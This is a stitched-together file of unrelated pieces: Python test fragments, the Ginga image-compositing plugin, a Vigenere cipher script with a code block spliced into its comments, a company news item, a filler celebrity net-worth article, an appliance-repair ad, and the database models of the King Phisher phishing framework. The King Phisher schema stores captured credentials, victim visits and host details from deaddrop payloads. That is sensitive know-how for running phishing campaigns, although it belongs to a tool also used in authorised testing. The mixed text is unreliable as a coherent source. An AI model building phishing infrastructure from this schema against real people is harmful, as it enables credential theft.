        self.checkVar('@partof(tyre,C)','C','car','wheel')
self.checkVar('@partof(hub,C)','C','car','wheel')
self.checkResults('@partof(O,C)',[])
def test2e(self):
self.checkVar('@partof_extended(C,car)','C','wheel','tyre','hub','car')
self.checkVar('@partof_extended(C,wheel)','C','tyre','hub','wheel')
self.checkTrue('@partof_extended(wheel,wheel)')
self.checkTrue('@partof_extended(wheel,car)')
self.checkVar('@partof_extended(wheel,C)','C','car','wheel')
self.checkVar('@partof_extended(tyre,C)','C','car','wheel','tyre')
self.checkVar('@partof_extended(hub,C)','C','car','wheel','hub')
self.checkResults('@partof_extended(O,C)',[])
def test2d(self):
self.checkVar('@partof_direct(C,car)','C','wheel')
self.checkVar('@partof_direct(C,wheel)','C','tyre','hub')
self.checkVar('@partof_direct(wheel,C)','C','car')
self.checkVar('@partof_direct(tyre,C)','C','wheel')
self.checkVar('@partof_direct(hub,C)','C','wheel')
self.checkResults('@partof_direct(O,C)',[])
if __name__ == '__main__':
unittest.main()
|
Bernard Collins has been re-appointed as chairman of Vhi Healthcare (VHI), Ireland's leading healthcare insurer-provider, for a further five years, with effect from today (September 24), the health ministry announced yesterday. Mr Collins is CEO of Lifemed Consulting and holds board-level positions at other companies in Ireland and the US. He served for 10 years as VP, international operations, at Boston Scientific until 2003.
|
#
# Compose.py -- Compose plugin for Ginga reference viewer
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import os
from ginga.gw import Widgets
from ginga.misc import Bunch
from ginga import RGBImage, LayerImage
from ginga import GingaPlugin
import numpy
try:
from PIL import Image
have_PIL = True
except ImportError:
have_PIL = False
class ComposeImage(RGBImage.RGBImage, LayerImage.LayerImage):
def __init__(self, *args, **kwdargs):
RGBImage.RGBImage.__init__(self, *args, **kwdargs)
LayerImage.LayerImage.__init__(self)
class Compose(GingaPlugin.LocalPlugin):
"""
Usage:
Start the Compose plugin from the Operation menu--the tab should
show up under "Dialogs"
- Press "New Image" to start composing a new RGB image.
- Drag your three constituent images that will make up the R, G and B
planes to the main viewer window--drag them in the order R (red),
G (green) and B (blue).
In the plugin, the R, G and B images should show up as three slider
controls in the Layers area of the plugin.
You should now have a composite three color image in the Compose preview
window. Most likely the image does not have good cut levels set, so you
may want to set cut levels on the image using any of the usual cut levels
controls.
- Play with the alpha levels of each layer using the sliders in the
Compose plugin, when you release a slider the image should update.
- When you see something you like you can save it to a file using the
"Save As" button.
"""
def __init__(self, fv, fitsimage):
# superclass defines some variables for us, like logger
super(Compose, self).__init__(fv, fitsimage)
self.limage = None
self.count = 0
self.layertag = 'compose-canvas'
self.dc = fv.getDrawClasses()
canvas = self.dc.DrawingCanvas()
canvas.set_callback('drag-drop', self.drop_file_cb)
canvas.setSurface(self.fitsimage)
self.canvas = canvas
self.gui_up = False
def build_gui(self, container):
top = Widgets.VBox()
top.set_border_width(4)
vbox, sw, orientation = Widgets.get_oriented_box(container)
vbox.set_border_width(4)
vbox.set_spacing(2)
self.msgFont = self.fv.getFont("sansFont", 12)
tw = Widgets.TextArea(wrap=True, editable=False)
tw.set_font(self.msgFont)
self.tw = tw
fr = Widgets.Expander("Instructions")
fr.set_widget(tw)
vbox.add_widget(fr, stretch=0)
fr = Widgets.Frame("Compositing")
captions = (("Compose Type:", 'label', "Compose Type", 'combobox'),
("New Image", 'button', "Insert Layer", 'button'),
)
w, b = Widgets.build_info(captions)
self.w.update(b)
fr.set_widget(w)
vbox.add_widget(fr, stretch=0)
combobox = b.compose_type
index = 0
for name in ('Alpha', 'RGB'):
combobox.append_text(name)
index += 1
combobox.set_index(1)
#combobox.add_callback('activated', self.set_combine_cb)
b.new_image.add_callback('activated', lambda w: self.new_cb())
b.new_image.set_tooltip("Start a new composite image")
b.insert_layer.add_callback('activated', lambda w: self.insert_cb())
b.insert_layer.set_tooltip("Insert channel image as layer")
fr = Widgets.Frame("Layers")
self.w.scales = fr
vbox.add_widget(fr, stretch=0)
hbox = Widgets.HBox()
hbox.set_border_width(4)
hbox.set_spacing(4)
btn = Widgets.Button("Save Image As")
btn.add_callback('activated', lambda w: self.save_as_cb())
hbox.add_widget(btn, stretch=0)
self.entry2 = Widgets.TextEntry()
hbox.add_widget(self.entry2, stretch=1)
self.entry2.add_callback('activated', lambda *args: self.save_as_cb())
vbox.add_widget(hbox, stretch=0)
# spacer
vbox.add_widget(Widgets.Label(''), stretch=1)
top.add_widget(sw, stretch=1)
btns = Widgets.HBox()
btns.set_border_width(4)
btns.set_spacing(4)
btn = Widgets.Button("Close")
btn.add_callback('activated', lambda w: self.close())
btns.add_widget(btn)
btns.add_widget(Widgets.Label(''), stretch=1)
top.add_widget(btns, stretch=0)
container.add_widget(top, stretch=1)
self.gui_up = True
def _gui_config_layers(self):
# remove all old scales
self.logger.debug("removing layer alpha controls")
self.w.scales.remove_all()
self.logger.debug("building layer alpha controls")
# construct a new vbox of alpha controls
captions = []
num_layers = self.limage.num_layers()
for i in range(num_layers):
layer = self.limage.get_layer(i)
captions.append((layer.name+':', 'label', 'layer_%d' % i, 'hscale'))
w, b = Widgets.build_info(captions)
self.w.update(b)
for i in range(num_layers):
layer = self.limage.get_layer(i)
adj = b['layer_%d' % (i)]
lower, upper = 0, 100
adj.set_limits(lower, upper, incr_value=1)
#adj.set_decimals(2)
adj.set_value(int(layer.alpha * 100.0))
#adj.set_tracking(True)
adj.add_callback('value-changed', self.set_opacity_cb, i)
self.logger.debug("adding layer alpha controls")
self.w.scales.set_widget(w)
def new_cb(self):
#self.fitsimage.clear()
name = "composite%d" % (self.count)
self.limage = ComposeImage(logger=self.logger, order='RGB')
# Alpha or RGB composition?
index = self.w.compose_type.get_index()
if index == 0:
self.limage.compose = 'alpha'
else:
self.limage.compose = 'rgb'
self._gui_config_layers()
self.limage.set(name=name, nothumb=True)
def _get_layer_attributes(self):
# Get layer name
idx = self.limage.num_layers()
if self.limage.compose == 'rgb':
idx = min(idx, 2)
names = ['Red', 'Green', 'Blue']
name = names[idx]
else:
name = 'layer%d' % (idx)
# Get alpha
alpha = 1.0
bnch = Bunch.Bunch(name=name, alpha=alpha, idx=idx)
return bnch
def insert_image(self, image):
if self.limage is None:
self.new_cb()
nlayers = self.limage.num_layers()
if (self.limage.compose == 'rgb') and (nlayers >= 3):
self.fv.show_error("There are already 3 layers")
return
elif nlayers == 0:
# populate metadata from first layer
metadata = image.get_metadata()
self.limage.update_metadata(metadata)
attrs = self._get_layer_attributes()
self.limage.insert_layer(attrs.idx, image, name=attrs.name,
alpha=attrs.alpha)
self._gui_config_layers()
self.logger.debug("setting layer image")
self.fitsimage.set_image(self.limage)
def insert_cb(self):
image = self.fitsimage.get_image()
self.insert_image(image)
def drop_file_cb(self, viewer, paths):
self.logger.info("dropped files: %s" % str(paths))
for path in paths[:3]:
image = self.fv.load_image(path)
self.insert_image(image)
return True
def set_opacity_cb(self, w, val, idx):
alpha = val / 100.0
self.limage.set_alpha(idx, alpha)
def _alphas_controls_to_layers(self):
self.logger.debug("updating layers in %s from controls" % self.limage)
num_layers = self.limage.num_layers()
vals = []
for i in range(num_layers):
alpha = self.w['layer_%d' % i].get_value() / 100.0
vals.append(alpha)
self.logger.debug("%d: alpha=%f" % (i, alpha))
self.limage.set_alphas(vals)
def _alphas_layers_to_controls(self):
self.logger.debug("updating controls from %s" % self.limage)
num_layers = self.limage.num_layers()
for i in range(num_layers):
layer = self.limage.get_layer(i)
self.logger.debug("%d: alpha=%f" % (i, layer.alpha))
ctrlname = 'layer_%d' % (i)
if ctrlname in self.w:
self.w[ctrlname].set_value(layer.alpha * 100.0)
def add_to_channel_cb(self):
image = self.limage.copy()
name = "composite%d" % (self.count)
self.count += 1
image.set(name=name)
self.fv.add_image(name, image)
def save_as_file(self, path, image, order='RGB'):
if not have_PIL:
raise Exception("You need to install PIL or pillow to save images")
data = image.get_data()
viewer = self.fitsimage
rgbmap = viewer.get_rgbmap()
vmin, vmax = 0, rgbmap.get_hash_size() - 1
# Cut levels on the full image, with settings from viewer
autocuts = viewer.autocuts
loval, hival = viewer.get_cut_levels()
data = autocuts.cut_levels(data, loval, hival,
vmin=vmin, vmax=vmax)
# result becomes an index array fed to the RGB mapper
if not numpy.issubdtype(data.dtype, numpy.dtype('uint')):
data = data.astype(numpy.uint)
# get RGB array using settings from viewer
rgbobj = rgbmap.get_rgbarray(data, order=order,
image_order='RGB')
data = rgbobj.get_array(order)
# Save image using PIL
p_image = Image.fromarray(data)
p_image.save(path)
def save_as_cb(self):
path = str(self.entry2.get_text()).strip()
if not path.startswith('/'):
path = os.path.join('.', path)
image = self.fitsimage.get_image()
self.fv.nongui_do(self.fv.error_wrap, self.save_as_file, path, image)
def instructions(self):
self.tw.set_text("""Drag R, then G then B images to the window. Adjust cut levels and contrast as desired.
Then manipulate channel mix using the sliders.""")
def close(self):
self.fv.stop_local_plugin(self.chname, str(self))
return True
def start(self):
self.instructions()
# start ruler drawing operation
p_canvas = self.fitsimage.get_canvas()
try:
obj = p_canvas.getObjectByTag(self.layertag)
except KeyError:
# Add ruler layer
p_canvas.add(self.canvas, tag=self.layertag)
self.resume()
def pause(self):
self.canvas.ui_setActive(False)
def resume(self):
self.canvas.ui_setActive(True)
def stop(self):
# remove the canvas from the image
p_canvas = self.fitsimage.get_canvas()
try:
p_canvas.deleteObjectByTag(self.layertag)
except Exception:
pass
self.canvas.ui_setActive(False)
self.fv.showStatus("")
self.gui_up = False
def redo(self):
pass
def __str__(self):
return 'compose'
#END
|
The popular theatre and television actor Joe Minoso is best known for his role in NBC's Chicago Fire. As of 2017, the Chicago Fire star, who needed help from real firefighters himself after getting trapped in an elevator earlier this year, has a net worth of $250,000.
Let's go through his career and find out how much Joe earns: his salary, sources of income, awards, and achievements. So, without further delay, let's start.
The 38-year-old handsome hunk is originally from the Bronx, New York, where he completed his schooling. While still in school, Joe saw his first girlfriend in a school play and decided he wanted to act as well. It's true; love can make you do things you never thought were possible.
His girlfriend then took him backstage where she introduced him to the crew. A year later, he was auditioning for a role in the production of Dracula.
After he completed his graduation from Adelphi University with a Bachelor's degree in Fine Arts and Northern Illinois University with a Master's in fine arts, Joe Minoso began his professional career working at Chicago's Teatro Vista, the largest Latino theater company in the Midwest.
After a long journey, Joe currently plays the role of a firefighter on NBC's Chicago Fire. Recently, he was rescued by real Chicago Firefighters after getting trapped in an elevator. Quite a coincidence!
Joe, who started his acting career after falling in love, has now successfully established himself as a renowned television personality and earned a lavish lifestyle. Joe Minoso draws a massive salary from his acting career and endorsements, which adds up to his current net worth of $250,000.
He has been nominated five times for Best Supporting Actor - Television for Chicago Fire but has never won. We hope he will soon add many awards to his achievement list.
Joe also works for social causes: in 2015, he hosted the inaugural WhirlyCruz Cup at WhirlyBall (a game like a cross between basketball, hockey, lacrosse, and bumper cars) in the Logan Square area to raise money for the 100 Club of Chicago, which benefits the families of fallen police officers and firefighters.
Here we would also like to add something about his lavish wedding. Check out the video where he talks about his wedding day.
The Chicago Fire star is doing great in his career. We wish him all the very best for his future and hope he achieves more success in the coming days.
|
#########################################################################################
#################### HOW TO USE ##########################
#########################################################################################
# This takes input from the terminal so run (in the proper cd): #
# 'python vigenere_plaintext_encrypt.py textFile.txt key' #
# Make sure the file is in the same folder as this script #
# You can also directly input the plain text: #
# 'python vigenere_plaintext_encrypt.py ThisIsPlainTextCamelCasing key' #
# #
# so obviously the first variable is the plaintext with no spaces allowed #
# and the key is an arbitrary length you use to encode the words #
# #
# #
# #
# For decrypting your code check the brother script 'vigenere_plaintext_decrypt.py' #
#########################################################################################
#########################################################################################
# Created by Craig O'Connor - Thursday, August 15, 2013 #
#########################################################################################
from sys import argv
script, plain_text, key = argv
plain_text_string = "%s" % plain_text
if ".txt" in plain_text_string:
with open(plain_text_string, 'r') as f:
plain_text_string = f.read()
plain_text_string = plain_text_string.lower()
key_string = "%s" % key
key_string = key_string.lower()
plain_text_num = []
key_num = []
encryption_val = []
encryption_char = ""
#Make sure the key length is long enough to convert the plaintext
while len(key_string) < len(plain_text_string):
key_string += key_string
#This is our value system using a dictionary for a table
num_char = { 0 : 'a', 1 : 'b', 2 : 'c', 3 : 'd', 4 : 'e', 5 : 'f', 6 : 'g', 7 : 'h', 8 : 'i',
9 : 'j', 10 : 'k', 11 : 'l', 12 : 'm', 13 : 'n', 14 : 'o', 15 : 'p', 16 : 'q',
17 : 'r', 18 : 's', 19 : 't', 20 : 'u', 21 : 'v', 22 : 'w', 23 : 'x', 24 : 'y',
25 : 'z' }
#Convert the plain_text and key into their character values and place each value in its own compartment
for i, c in enumerate(plain_text_string):
for value, char in num_char.items():
if char == c:
plain_text_num.append(value)
for i, c in enumerate(key_string):
for value, char in num_char.items():
if char == c:
key_num.append(value)
#Create encryption values
for i in range(0,len(plain_text_num)):
#Cipher_value = (Message_value + Key_value) mod 26
encryption_val.append((plain_text_num[i] + key_num[i]) % 26)
#Finish up, turn those values into the proper characters:
for i in range(0,len(encryption_val)):
for value, char in num_char.items():
if value == encryption_val[i]:
encryption_char += char
print(encryption_char)
with open('cipher_text.txt', 'w') as f:
f.write(encryption_char)
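#As a quick sanity check of the formula above, the same shift can be written
#as one small function (the function name and sample keys below are ours, not
#part of this script). A minimal sketch:

```python
# Minimal sketch of the same Vigenere step: cipher = (plain + key) mod 26,
# with letters mapped a=0 ... z=25. Names here are illustrative only.
def vigenere_encrypt(plain_text, key):
    # Repeat the key until it covers the plaintext, as the script above does.
    repeated_key = (key * (len(plain_text) // len(key) + 1))[:len(plain_text)]
    return ''.join(
        chr((ord(p) - ord('a') + ord(k) - ord('a')) % 26 + ord('a'))
        for p, k in zip(plain_text, repeated_key)
    )

# Classic textbook test vector:
print(vigenere_encrypt('attackatdawn', 'lemon'))  # -> lxfopvefrnhr
```

#The classic pair 'attackatdawn' under key 'lemon' should come out as
#'lxfopvefrnhr'; if this script prints something different, check the key.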
|
Professional range repair in Lemon Grove gets you back to cooking. Any issue can be a hint that the range is not working well, but first it is very important to know how your oven works.
Factory-trained range technicians in Lemon Grove see all kinds of symptoms: your gas igniter may glow but not light, there may be no sign of heat while broiling, or, believe it or not, the oven may be too hot. Yes, this can be an issue, as it will cook your food faster but burn it in no time. There are other trouble signs depending on the model of your range or oven, such as a program board that will not program or a door that will not open after finishing a cycle. So before attempting this kind of maintenance at home, or cleaning any parts that you suspect may be causing trouble to your range, call a range appliance repair technician to minimize the possibility of electric shock. There are so many models of ranges that it is most important to know yours before calling for service.
Range Repair Lemon Grove: (323) 999-5434. My Appliance Repair Lemon Grove specializes in all ranges. Schedule your service call today and receive a 10% off labor discount.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/database/models.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import operator
from king_phisher import errors
from king_phisher import utilities
from king_phisher.server import signals
import sqlalchemy
import sqlalchemy.event
import sqlalchemy.ext.declarative
import sqlalchemy.orm
DATABASE_TABLE_REGEX = '[a-z_]+'
"""A regular expression which will match all valid database table names."""
SCHEMA_VERSION = 7
"""The schema version of the database, used for compatibility checks."""
database_tables = {}
"""A dictionary which contains all the database tables and their column names."""
database_table_objects = {}
"""A dictionary which contains all the database tables and their primitive objects."""
logger = logging.getLogger('KingPhisher.Server.Database.Models')
def current_timestamp(*args, **kwargs):
"""
The function used for creating the timestamp used by database objects.
:return: The current timestamp.
:rtype: :py:class:`datetime.datetime`
"""
return datetime.datetime.utcnow()
def get_tables_with_column_id(column_id):
"""
Get all tables which contain a column named *column_id*.
:param str column_id: The column name to get all the tables of.
:return: The list of matching tables.
:rtype: set
"""
return set(x[0] for x in database_tables.items() if column_id in x[1])
def forward_signal_delete(mapper, connection, target):
signals.safe_send('db-table-delete', logger, target.__tablename__, mapper=mapper, connection=connection, target=target)
def forward_signal_insert(mapper, connection, target):
signals.safe_send('db-table-insert', logger, target.__tablename__, mapper=mapper, connection=connection, target=target)
def forward_signal_update(mapper, connection, target):
signals.safe_send('db-table-update', logger, target.__tablename__, mapper=mapper, connection=connection, target=target)
def register_table(table):
"""
Register a database table. This will populate the information provided in
the :py:data:`database_tables` dictionary. This also forwards signals to the
appropriate listeners within the :py:mod:`server.signals` module.
:param cls table: The table to register.
"""
columns = tuple(col.name for col in table.__table__.columns)
database_tables[table.__tablename__] = columns
database_table_objects[table.__tablename__] = table
sqlalchemy.event.listen(table, 'before_delete', forward_signal_delete)
sqlalchemy.event.listen(table, 'before_insert', forward_signal_insert)
sqlalchemy.event.listen(table, 'before_update', forward_signal_update)
return table
class BaseRowCls(object):
"""
The base class from which other database table objects inherit.
Provides a standard ``__repr__`` method and default permission checks which
are to be overridden as desired by subclasses.
"""
__repr_attributes__ = ()
"""Attributes which should be included in the __repr__ method."""
is_private = False
"""Whether the table is only allowed to be accessed by the server or not."""
def __repr__(self):
description = "<{0} id={1} ".format(self.__class__.__name__, repr(self.id))
for repr_attr in self.__repr_attributes__:
description += "{0}={1!r} ".format(repr_attr, getattr(self, repr_attr))
description += '>'
return description
def assert_session_has_permissions(self, *args, **kwargs):
"""
A convenience function which wraps :py:meth:`~.session_has_permissions`
and raises a :py:exc:`~king_phisher.errors.KingPhisherPermissionError`
if the session does not have the specified permissions.
"""
if self.session_has_permissions(*args, **kwargs):
return
raise errors.KingPhisherPermissionError()
def session_has_permissions(self, access, session):
"""
Check that the authenticated session has the permissions specified in
*access*. The permissions in *access* are abbreviated with the first
letter of create, read, update, and delete.
:param str access: The desired permissions.
:param session: The authenticated session to check access for.
:return: Whether the session has the desired permissions.
:rtype: bool
"""
if self.is_private:
return False
access = access.lower()
for case in utilities.switch(access, comp=operator.contains, swapped=True):
if case('c') and not self.session_has_create_access(session):
break
if case('r') and not self.session_has_read_access(session):
break
if case('u') and not self.session_has_update_access(session):
break
if case('d') and not self.session_has_delete_access(session):
break
else:
return True
return False
def session_has_create_access(self, session):
if self.is_private:
return False
return True
def session_has_delete_access(self, session):
if self.is_private:
return False
return True
def session_has_read_access(self, session):
if self.is_private:
return False
return True
def session_has_read_prop_access(self, session, prop):
return self.session_has_read_access(session)
def session_has_update_access(self, session):
if self.is_private:
return False
return True
Base = sqlalchemy.ext.declarative.declarative_base(cls=BaseRowCls)
metadata = Base.metadata
class TagMixIn(object):
__repr_attributes__ = ('name',)
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String, nullable=False)
description = sqlalchemy.Column(sqlalchemy.String)
@register_table
class AlertSubscription(Base):
__repr_attributes__ = ('campaign_id', 'user_id')
__tablename__ = 'alert_subscriptions'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
user_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('users.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
type = sqlalchemy.Column(sqlalchemy.Enum('email', 'sms', name='alert_subscription_type'), default='sms', server_default='sms', nullable=False)
mute_timestamp = sqlalchemy.Column(sqlalchemy.DateTime)
def session_has_create_access(self, session):
return session.user == self.user_id
def session_has_delete_access(self, session):
return session.user == self.user_id
def session_has_read_access(self, session):
return session.user == self.user_id
def session_has_update_access(self, session):
return session.user == self.user_id
@register_table
class AuthenticatedSession(Base):
__repr_attributes__ = ('user_id',)
__tablename__ = 'authenticated_sessions'
is_private = True
id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)
created = sqlalchemy.Column(sqlalchemy.Integer, nullable=False)
last_seen = sqlalchemy.Column(sqlalchemy.Integer, nullable=False)
user_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('users.id'), nullable=False)
@register_table
class Campaign(Base):
__repr_attributes__ = ('name',)
__tablename__ = 'campaigns'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String, unique=True, nullable=False)
description = sqlalchemy.Column(sqlalchemy.String)
user_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('users.id'), nullable=False)
created = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
reject_after_credentials = sqlalchemy.Column(sqlalchemy.Boolean, default=False)
expiration = sqlalchemy.Column(sqlalchemy.DateTime)
campaign_type_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaign_types.id'))
company_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('companies.id'))
# relationships
alert_subscriptions = sqlalchemy.orm.relationship('AlertSubscription', backref='campaign', cascade='all, delete-orphan')
credentials = sqlalchemy.orm.relationship('Credential', backref='campaign', cascade='all, delete-orphan')
deaddrop_connections = sqlalchemy.orm.relationship('DeaddropConnection', backref='campaign', cascade='all, delete-orphan')
deaddrop_deployments = sqlalchemy.orm.relationship('DeaddropDeployment', backref='campaign', cascade='all, delete-orphan')
landing_pages = sqlalchemy.orm.relationship('LandingPage', backref='campaign', cascade='all, delete-orphan')
messages = sqlalchemy.orm.relationship('Message', backref='campaign', cascade='all, delete-orphan')
visits = sqlalchemy.orm.relationship('Visit', backref='campaign', cascade='all, delete-orphan')
@property
def has_expired(self):
if self.expiration is None:
return False
if self.expiration > current_timestamp():
return False
return True
@register_table
class CampaignType(TagMixIn, Base):
__tablename__ = 'campaign_types'
# relationships
campaigns = sqlalchemy.orm.relationship('Campaign', backref='campaign_type')
@register_table
class Company(Base):
__repr_attributes__ = ('name',)
__tablename__ = 'companies'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String, unique=True, nullable=False)
description = sqlalchemy.Column(sqlalchemy.String)
industry_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('industries.id'))
url_main = sqlalchemy.Column(sqlalchemy.String)
url_email = sqlalchemy.Column(sqlalchemy.String)
url_remote_access = sqlalchemy.Column(sqlalchemy.String)
# relationships
campaigns = sqlalchemy.orm.relationship('Campaign', backref='company', cascade='all')
@register_table
class CompanyDepartment(TagMixIn, Base):
__tablename__ = 'company_departments'
# relationships
messages = sqlalchemy.orm.relationship('Message', backref='company_department')
@register_table
class Credential(Base):
__repr_attributes__ = ('campaign_id', 'username')
__tablename__ = 'credentials'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
visit_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('visits.id'), nullable=False)
message_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('messages.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
username = sqlalchemy.Column(sqlalchemy.String)
password = sqlalchemy.Column(sqlalchemy.String)
submitted = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
@register_table
class DeaddropDeployment(Base):
__repr_attributes__ = ('campaign_id', 'destination')
__tablename__ = 'deaddrop_deployments'
id = sqlalchemy.Column(sqlalchemy.String, default=lambda: utilities.random_string(16), primary_key=True)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
destination = sqlalchemy.Column(sqlalchemy.String)
# relationships
deaddrop_connections = sqlalchemy.orm.relationship('DeaddropConnection', backref='deaddrop_deployment', cascade='all, delete-orphan')
@register_table
class DeaddropConnection(Base):
__repr_attributes__ = ('campaign_id', 'deployment_id', 'visitor_ip')
__tablename__ = 'deaddrop_connections'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
deployment_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('deaddrop_deployments.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
visit_count = sqlalchemy.Column(sqlalchemy.Integer, default=1)
visitor_ip = sqlalchemy.Column(sqlalchemy.String)
local_username = sqlalchemy.Column(sqlalchemy.String)
local_hostname = sqlalchemy.Column(sqlalchemy.String)
local_ip_addresses = sqlalchemy.Column(sqlalchemy.String)
first_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
last_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
@register_table
class Industry(TagMixIn, Base):
__tablename__ = 'industries'
# relationships
companies = sqlalchemy.orm.relationship('Company', backref='industry')
@register_table
class LandingPage(Base):
__repr_attributes__ = ('campaign_id', 'hostname', 'page')
__tablename__ = 'landing_pages'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
hostname = sqlalchemy.Column(sqlalchemy.String, nullable=False)
page = sqlalchemy.Column(sqlalchemy.String, nullable=False)
@register_table
class StorageData(Base):
__repr_attributes__ = ('namespace', 'key', 'value')
__tablename__ = 'storage_data'
is_private = True
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
created = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
namespace = sqlalchemy.Column(sqlalchemy.String)
key = sqlalchemy.Column(sqlalchemy.String, nullable=False)
value = sqlalchemy.Column(sqlalchemy.Binary)
@register_table
class Message(Base):
__repr_attributes__ = ('campaign_id', 'target_email')
__tablename__ = 'messages'
id = sqlalchemy.Column(sqlalchemy.String, default=utilities.make_message_uid, primary_key=True)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
target_email = sqlalchemy.Column(sqlalchemy.String)
first_name = sqlalchemy.Column(sqlalchemy.String)
last_name = sqlalchemy.Column(sqlalchemy.String)
opened = sqlalchemy.Column(sqlalchemy.DateTime)
opener_ip = sqlalchemy.Column(sqlalchemy.String)
opener_user_agent = sqlalchemy.Column(sqlalchemy.String)
sent = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
trained = sqlalchemy.Column(sqlalchemy.Boolean, default=False)
company_department_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('company_departments.id'))
# relationships
credentials = sqlalchemy.orm.relationship('Credential', backref='message', cascade='all, delete-orphan')
visits = sqlalchemy.orm.relationship('Visit', backref='message', cascade='all, delete-orphan')
@register_table
class MetaData(Base):
__repr_attributes__ = ('value_type', 'value')
__tablename__ = 'meta_data'
is_private = True
id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)
value_type = sqlalchemy.Column(sqlalchemy.String, default='str')
value = sqlalchemy.Column(sqlalchemy.String)
@register_table
class User(Base):
__tablename__ = 'users'
id = sqlalchemy.Column(sqlalchemy.String, default=lambda: utilities.random_string(16), primary_key=True)
phone_carrier = sqlalchemy.Column(sqlalchemy.String)
phone_number = sqlalchemy.Column(sqlalchemy.String)
email_address = sqlalchemy.Column(sqlalchemy.String)
otp_secret = sqlalchemy.Column(sqlalchemy.String(16))
# relationships
alert_subscriptions = sqlalchemy.orm.relationship('AlertSubscription', backref='user', cascade='all, delete-orphan')
campaigns = sqlalchemy.orm.relationship('Campaign', backref='user', cascade='all, delete-orphan')
def session_has_create_access(self, session):
return False
def session_has_delete_access(self, session):
return False
def session_has_read_access(self, session):
return session.user == self.id
def session_has_read_prop_access(self, session, prop):
        if prop in ('id', 'campaigns'):  # everyone can read the id and campaign list
return True
return self.session_has_read_access(session)
def session_has_update_access(self, session):
return session.user == self.id
@register_table
class Visit(Base):
__repr_attributes__ = ('campaign_id', 'message_id')
__tablename__ = 'visits'
id = sqlalchemy.Column(sqlalchemy.String, default=utilities.make_visit_uid, primary_key=True)
message_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('messages.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
visit_count = sqlalchemy.Column(sqlalchemy.Integer, default=1)
visitor_ip = sqlalchemy.Column(sqlalchemy.String)
visitor_details = sqlalchemy.Column(sqlalchemy.String)
first_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
last_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
# relationships
credentials = sqlalchemy.orm.relationship('Credential', backref='visit', cascade='all, delete-orphan')
|
